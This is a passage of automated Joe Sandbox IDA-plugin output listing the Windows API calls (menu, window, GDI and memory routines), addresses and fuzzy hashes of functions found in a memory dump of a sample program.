                                                                                                                                                                                                                                                                • API String ID: 4074774880-0
                                                                                                                                                                                                                                                                • Opcode ID: ac71cb6998a70258596a92940346289a4c3e2d43caf1ffb487873d265b680c22
                                                                                                                                                                                                                                                                • Instruction ID: ba3fc2e0090eb7c0e95040730e8310bccc3febf1828465415595b963e32d3a33
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac71cb6998a70258596a92940346289a4c3e2d43caf1ffb487873d265b680c22
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E31B676A00218ABDB14DF95DC45AEEBBB9FF49710F10416AFE05A7290DB70AD10DBE0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 001230CC
                                                                                                                                                                                                                                                                • GetSubMenu.USER32(?,00000000), ref: 001230E2
                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00123108
                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 00123163
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000036E,?,?), ref: 0012319B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$Item$CountMessageSendWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3454759385-0
                                                                                                                                                                                                                                                                • Opcode ID: e38beba9552770871e3d81d2052b9c61e72eb4f243abaab553cf499a3f37ae15
                                                                                                                                                                                                                                                                • Instruction ID: a3c09f8a6160ae0f987a584c2c4d6826e963a0ee62af77a274ac6f30c2f1b62c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e38beba9552770871e3d81d2052b9c61e72eb4f243abaab553cf499a3f37ae15
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD310632600225BB9B256F65FC499AFB7ADFF95750B014139F811D3110DB74EE319BA0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0013810D
                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 0013813B
                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00138148
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000157,00000000,00000000), ref: 0013815D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014F,00000001,00000000), ref: 00138172
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendState$Parent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1284845784-0
                                                                                                                                                                                                                                                                • Opcode ID: 7047f12bb17e86fdc14786848928a6e90d5c6eb8c8543b6be8b5126d41186925
                                                                                                                                                                                                                                                                • Instruction ID: 6ceb370c92e92d077a37af0c4b257444a12d20e44bd2bbe6c0a46e326b360f5b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7047f12bb17e86fdc14786848928a6e90d5c6eb8c8543b6be8b5126d41186925
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3021F036300301AFEF2D7B74AC98ABAB7AAAB95744F05043DF506960A0DFA0DC429750
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00146BE0
                                                                                                                                                                                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 00146BFF
                                                                                                                                                                                                                                                                  • Part of subcall function 0012844D: SelectClipRgn.GDI32(?,00000000), ref: 0012846D
                                                                                                                                                                                                                                                                  • Part of subcall function 0012844D: SelectClipRgn.GDI32(?,00000000), ref: 00128483
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00146C1F
                                                                                                                                                                                                                                                                • MapWindowPoints.USER32(?,-00000001,?,00000001), ref: 00146C6D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000014,00000000,-00000001), ref: 00146C98
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClipSelect$CreateH_prolog3IndirectMessageParentPointsRectSendWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3362736716-0
                                                                                                                                                                                                                                                                • Opcode ID: 569ce1b4d46c6a30c041d88845a005259861f7277448e321ec7a9bcd2e4783a5
                                                                                                                                                                                                                                                                • Instruction ID: 4bf4a565ac1c1e7d806420e75f6b7c10b9c91e3c2df480fccb77db3ca54cd9b9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 569ce1b4d46c6a30c041d88845a005259861f7277448e321ec7a9bcd2e4783a5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8314B76A0022AAFCF00EFA4D848AEE7BB5FF59300F054115F915AB261CB759E10CBA1
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 001306DF
                                                                                                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00130717
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,00000000), ref: 00130743
                                                                                                                                                                                                                                                                  • Part of subcall function 0012840E: ScreenToClient.USER32(?,?), ref: 0012841D
                                                                                                                                                                                                                                                                  • Part of subcall function 0012840E: ScreenToClient.USER32(?,00000000), ref: 0012842A
                                                                                                                                                                                                                                                                • OffsetRect.USER32(00000000,00000000,?), ref: 0013075B
                                                                                                                                                                                                                                                                  • Part of subcall function 00124C32: SetWindowPos.USER32(?,?,00000015,000000FF,000000FF,?,?,?,?,0011F252,00000000,?,?,000000FF,000000FF,00000015), ref: 00124C5A
                                                                                                                                                                                                                                                                • GetWindow.USER32(?,00000002), ref: 0013077B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ClientRectScreen$OffsetParent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 622029514-0
                                                                                                                                                                                                                                                                • Opcode ID: fe99405fc324fa00f90717c193dd76751a24ff0d58f1128c6a91ed4163987c92
                                                                                                                                                                                                                                                                • Instruction ID: cbbeeb669f4ffea91cf229be58dd164ab8e2fcd71bfb26170d6b8d088386d692
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe99405fc324fa00f90717c193dd76751a24ff0d58f1128c6a91ed4163987c92
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09219271A0071AAFDF11ABA4EC49BAEB7B8FF08721F100525F544A6291DF74DD108BA0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(000D20E8), ref: 00122145
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00122151
                                                                                                                                                                                                                                                                  • Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(000D2100), ref: 00122185
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(000D2114), ref: 0012219B
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 001221A7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressInit_thread_footerProc$Exception@8HandleModuleThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3795892493-0
                                                                                                                                                                                                                                                                • Opcode ID: 13fe294f73cc160baafee0a0a761dc75560fb4e3b28a97f06119db0efe5cc14d
                                                                                                                                                                                                                                                                • Instruction ID: 517244d15a2bd351f8177040d2f2e2dd50a21486b8297e5ae702c46d148fa82c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13fe294f73cc160baafee0a0a761dc75560fb4e3b28a97f06119db0efe5cc14d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82216BB9525220EFEB14AF14FC89AADB7A5FB04714F29011AF901472B1CB7058F0CF50
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00150CE6
                                                                                                                                                                                                                                                                  • Part of subcall function 00126685: DeleteObject.GDI32(?), ref: 00126697
                                                                                                                                                                                                                                                                  • Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00150CFB
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00150D61
                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00150D70
                                                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(0028A14C), ref: 00150D8A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$Delete$Select$CriticalException@8LeaveSectionThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2943068176-0
                                                                                                                                                                                                                                                                • Opcode ID: 401395076d8a001ee16521e6a4901295f6fbaa9b52488404219bf9541d7e9f3a
                                                                                                                                                                                                                                                                • Instruction ID: 0b7da81fb51d8f3e6d9a04c519e9b1111d8058d112dda51de563468a16d1698b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 401395076d8a001ee16521e6a4901295f6fbaa9b52488404219bf9541d7e9f3a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13212674900200DFCF11AFE4EC8859ABBB4FF5A312F104266FD289E166CBB1A845CB51
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ParentWindow$ActiveEnableEnabledLastPopup
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2630416829-0
                                                                                                                                                                                                                                                                • Opcode ID: caeb948c84baddfd021b3b15da23f3325d1707d63b362d4a50b31dcbfa992eb1
                                                                                                                                                                                                                                                                • Instruction ID: 75a5fdcb6f4c8df8b092b3fc53edffaff7a1f0eecf015c61c2341e88c962ee2b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: caeb948c84baddfd021b3b15da23f3325d1707d63b362d4a50b31dcbfa992eb1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D21186326253215797292E65ACD8BEA769CAFA6B61F050135ED25D7280EF60CC804EA1
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientCursorRect$Screen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1023402310-0
                                                                                                                                                                                                                                                                • Opcode ID: f24431b17636b776f9541514f744b4f8c1bf454cd9d150bd51ade3478eeb798b
                                                                                                                                                                                                                                                                • Instruction ID: 9c2f9ce63e2fa6cfbb60bdddf68fb60a598f564fefcd01782d29bce00a16267c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f24431b17636b776f9541514f744b4f8c1bf454cd9d150bd51ade3478eeb798b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF111871D0120ADFCB11AFA5E9498BFFBF9FF99301B10442AE516A2110DB74AA02DF50
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(000D1AAC,?,?,0011B7AA,00102804,00000001,?,000000FF,?,000000FF), ref: 00126079
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000D2CE8), ref: 00126089
                                                                                                                                                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 00126092
                                                                                                                                                                                                                                                                • RtlDecodePointer.NTDLL(00289804), ref: 001260A0
                                                                                                                                                                                                                                                                • CompareStringW.KERNEL32(00000000,?,?,?,?,?,?,?,0011B7AA,00102804,00000001,?,000000FF,?,000000FF), ref: 001260E7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Pointer$AddressCompareDecodeEncodeHandleModuleProcString
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 866791306-0
                                                                                                                                                                                                                                                                • Opcode ID: c2a05e2c612c0a24bb877637bbe2fbb4c1483745084b7bfae11e6943102fa314
                                                                                                                                                                                                                                                                • Instruction ID: 7a6eafc8addaaf6259b9deb450ee6e601987fe29ec0b35e68c025e266c18b18e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2a05e2c612c0a24bb877637bbe2fbb4c1483745084b7bfae11e6943102fa314
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7101163650122ABFCF122FA0FC09DAE3F6AEF09751B054511FE05921A0DBB1C870AFA4
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 001265BD
                                                                                                                                                                                                                                                                • GetParent.USER32(00000000), ref: 001265DE
                                                                                                                                                                                                                                                                  • Part of subcall function 001268FB: GetClassNameW.USER32(?,?,0000000A), ref: 0012692F
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0012660B
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00126613
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 00126627
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Parent$ClassDesktopFocusMessageNameSendWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3500994180-0
                                                                                                                                                                                                                                                                • Opcode ID: 7916f09b977f305f16b1ca171686e1f0bbd3e0ad3fea3881effb5b932eff1bd2
                                                                                                                                                                                                                                                                • Instruction ID: 19b8c1e2127a1dcaa0c8ba3cfc40775b0208cf0ad73ad6133246b40abc871815
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7916f09b977f305f16b1ca171686e1f0bbd3e0ad3fea3881effb5b932eff1bd2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7EF0A43110123263D7223B25BC4DF6E76599BCAF51F4A0122F901B72D0DFA4CC5245A9
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00118C1C: __EH_prolog3.LIBCMT ref: 00118C23
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000433,00000000,?), ref: 00120E56
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: H_prolog3MessageSend
                                                                                                                                                                                                                                                                • String ID: ${($${($,
                                                                                                                                                                                                                                                                • API String ID: 936991600-3578809944
                                                                                                                                                                                                                                                                • Opcode ID: 9f7fd040e8c519053260e945509416ed9bb0a8b4476bf6119fedfb52f89074d7
                                                                                                                                                                                                                                                                • Instruction ID: 6b0738c5c224762f4d780680bfa50d1458f9cf77b0a6ec40b949c074306ce084
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f7fd040e8c519053260e945509416ed9bb0a8b4476bf6119fedfb52f89074d7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C71E931701629ABCF19AFB4E891AAD77A5BF48310B050279F8059B692DF30ED618B90
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0014EA15
                                                                                                                                                                                                                                                                  • Part of subcall function 0012738B: __EH_prolog3.LIBCMT ref: 00127392
                                                                                                                                                                                                                                                                  • Part of subcall function 001284D9: SelectObject.GDI32(?,0017A280), ref: 001284E2
                                                                                                                                                                                                                                                                • FillRect.USER32(?,00000000,-00000098), ref: 0014EB2A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FillH_prolog3H_prolog3_ObjectRectSelect
                                                                                                                                                                                                                                                                • String ID: 0$(
                                                                                                                                                                                                                                                                • API String ID: 828880526-994966199
                                                                                                                                                                                                                                                                • Opcode ID: 6c229316648dc7c226b5392212647678131fa56127a3df04ce8147770149a814
                                                                                                                                                                                                                                                                • Instruction ID: 9eabd49033f0c01552ef4d366cec8e7351e949beaccb52b099ba0da6e8e96af0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c229316648dc7c226b5392212647678131fa56127a3df04ce8147770149a814
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99510871D10258AFDB14EFA5D885AAEFBB8FF14304F14812EE416AB2A1DB749909CF50
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 001319E0
                                                                                                                                                                                                                                                                • _memcpy_s.LIBCMT ref: 00131B55
                                                                                                                                                                                                                                                                • _memcpy_s.LIBCMT ref: 00131BBE
                                                                                                                                                                                                                                                                  • Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718
                                                                                                                                                                                                                                                                • PathRemoveFileSpecW.SHLWAPI(?,?,?,00000000), ref: 00131CFB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _memcpy_s$Exception@8FileH_prolog3PathRemoveSpecThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3480982519-0
                                                                                                                                                                                                                                                                • Opcode ID: 23d01f1d2868f95c3d5e4e9ef7186a83977e3611ea887c36e5211e465d24b3ff
                                                                                                                                                                                                                                                                • Instruction ID: ca48409a1f09cb9834797a114a03a5c032b1069c27ad3f05444abcf0d80bc1f7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23d01f1d2868f95c3d5e4e9ef7186a83977e3611ea887c36e5211e465d24b3ff
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7102FF71E016169FDB19DFA8C851AEEBBB6BF84310F14817DE811AB295DB309941CF60
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EmptyRect$Window
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1945993337-0
                                                                                                                                                                                                                                                                • Opcode ID: 62ad50a7b06c220ef8ad00f6e51d3235c7e65b3ad2f5b4631f65ea48f52c1376
                                                                                                                                                                                                                                                                • Instruction ID: f3703c699d009ef52fffbb659a2b154b23afc718eed640d0737a40714ebb4cbb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62ad50a7b06c220ef8ad00f6e51d3235c7e65b3ad2f5b4631f65ea48f52c1376
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9615B71A01605CFCB09DF68C895BAA73B9FF09304F1441B9ED15AF296DB71A906CF90
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 0012AF86
                                                                                                                                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 0012B089
                                                                                                                                                                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 0012B164
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0012B16B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$FreeH_prolog3_catchWire
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 349731180-0
                                                                                                                                                                                                                                                                • Opcode ID: b243a9693524ca297483fe0920afdcd0088ef627b59a4df94bd44112e628950b
                                                                                                                                                                                                                                                                • Instruction ID: 1d5e1b0ace163f297e384ee87d1814a71b8060fb6ec5810a34b1f0d5fb00b5f8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b243a9693524ca297483fe0920afdcd0088ef627b59a4df94bd44112e628950b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D51A530E002299FCF09EFA4E895AEEBBB4BF18310F154019F912B7291DB349E51CB91
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InflateRect.USER32(?), ref: 001338F8
                                                                                                                                                                                                                                                                • InflateRect.USER32(?), ref: 0013395D
                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00133991
                                                                                                                                                                                                                                                                  • Part of subcall function 0012FFE2: __EH_prolog3.LIBCMT ref: 0012FFE9
                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 001339C3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InflateRect$H_prolog3
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3346915232-0
                                                                                                                                                                                                                                                                • Opcode ID: 946f1661cd58615af523251e841e93dae78a6128e0b6be8cd38c2da510e29588
                                                                                                                                                                                                                                                                • Instruction ID: 21d7b9b72a5b547c45f4757456890561a25fe010fe3ecc4b861acaf137dee7b1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 946f1661cd58615af523251e841e93dae78a6128e0b6be8cd38c2da510e29588
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC418E31504214EFCB24AF64DD48FAA7BBABF56324F05466DF866861A1CBB09A50CB60
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 001350C9
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00135193
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0013519C
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 001351AB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$Delete
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 774837909-0
                                                                                                                                                                                                                                                                • Opcode ID: a331541b24d78e514c3a3fa942475c87ad715b58bf85efd98db2c1d06c0347a3
                                                                                                                                                                                                                                                                • Instruction ID: b4cb5a891fa2b8bdd7afb1a75c957b574c571e4167bb8acd177b7a45d2889e08
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a331541b24d78e514c3a3fa942475c87ad715b58bf85efd98db2c1d06c0347a3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83416B72A00A09DBDF28DFA4C885BEEB7B6AB54B00F258125F811A7280D775CD84CBD1
